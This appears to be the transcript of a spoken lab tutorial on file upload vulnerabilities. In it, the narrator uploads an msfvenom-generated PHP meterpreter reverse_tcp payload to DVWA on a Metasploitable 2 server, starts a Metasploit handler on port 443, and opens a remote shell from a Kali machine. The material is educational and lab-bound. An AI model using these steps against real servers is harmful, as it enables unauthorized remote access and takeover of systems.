In this session, we will discuss about file upload vulnerability. Many websites require file upload functionality for their users. Social networking websites such as Facebook and Twitter allows their user to upload profile pictures. Job portals allow their users to upload their resumes. File upload functionality is crucial for many web applications. At the same time, it is a big risk to the application as well as to the server if proper security controls are not implemented on file uploads. File upload vulnerability is a major problem with web-based applications. In many web servers, this vulnerability depends entirely on purpose that allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the website. An attacker may reveal internal information of web server to others, and in some chances to sensitive data might be informal by unauthorized people. Now I am going to show you live demonstration of file upload vulnerability. So for this demonstration we use two operating system. One is as a attacker machine, which is Kali Linux, and another one is server machine, which is Metasploitable 2 operating system. So the web application is running in server, which is Metasploitable 2 operating system with the IP address 192.168.0.100. So now I am opening the web application which is running in the victim server. One 192.168.0.100. And go to the particular web application DVW, a damn vulnerable web application. Username is admin and password and login. Now as usual we set the DVW security level as low, then submit. Now see, here is a file upload vulnerability is present, means it asking for some file which the web application upload into its internal storage space. So by using this option we can upload a malicious code inside the server. Now I am using a malicious PHP script to upload inside the server using file upload vulnerabilities, and through that particular malicious script we are taking the access of the server. So let's open the terminal and open the Metasploit framework by typing msf console. Okay, now I am using a payload related to the term php/meterpreter/reverse_tcp to create the malicious code. So first search for the payload php/meterpreter/reverse_tcp. So where is the payload? We use this payload to create the binary. So now open another terminal. Now we are using MSF Venom to create the binary. MSF Venom -p specify the payload name, which is php/meterpreter/reverse TCP. Then lhost. Lhost is the IP address of the attacker machine. So find out the Kali machine IP address by typing ifconfig. The IP address is 192.168.0.101. 192.168.0.101. Then L port is equals to, suppose I am using the port 443 to establish the connection. Then capital R is used for the raw version, and then the file is saved under the folder root. Then my file, then the file name is suppose cell.php. It will take some time to create the binary. Oh, it's created. Now check the folder. My file cell.php. Okay, it's created. Now I'm going to upload this malicious code using the file upload vulnerability inside the web application DVWA, which is running inside the server. So go to that particular page where the file upload vulnerability is present. So here is the page, and browse and go to the root directory, and then my file, and then cell.php. Okay, then upload. So you upload that particular binary, and it successfully uploaded in the location hackable slash upload slash then file name cell.php. Okay, so it's already uploaded. So before executing this particular malicious code, we need to open the handler from Metasploit framework. So go to the Metasploit framework first. Here is my Metasploit framework, and first we need to open the handler. So use exploit slash multi slash handler. So now we need to set the payload. Set payload php slash meterpreter slash reverse TCP. Now by using the show options command, we can check all the available option we need to specify. So we need to specify the L host. So set L host, that is 192.168.0.101, which we got previously, 101. Okay. Now we need to set the L port. Set L port suppose 443. Now again check all the option by using show options command. Okay, all are set. lhost, lport are set. Now we need to open the listener, exploit or run. So the reverse TCP handler is on. Now go to the browser and go to that particular location to execute the malicious code shell.php. See, we got the meterpreter session, and this session is created with the server where we upload and execute the malicious code or binary. So now let's check the information of the server by using the command sysinfo and see it's Linux Metasploitable 2. So we got the access of the server machine. By using the shell command, we can also get the shell access of the server machine. So this way, by using the file upload vulnerability, we can upload the malicious file or malicious code into the server where the web application is running, and we can also get the access of that particular server. Thank you.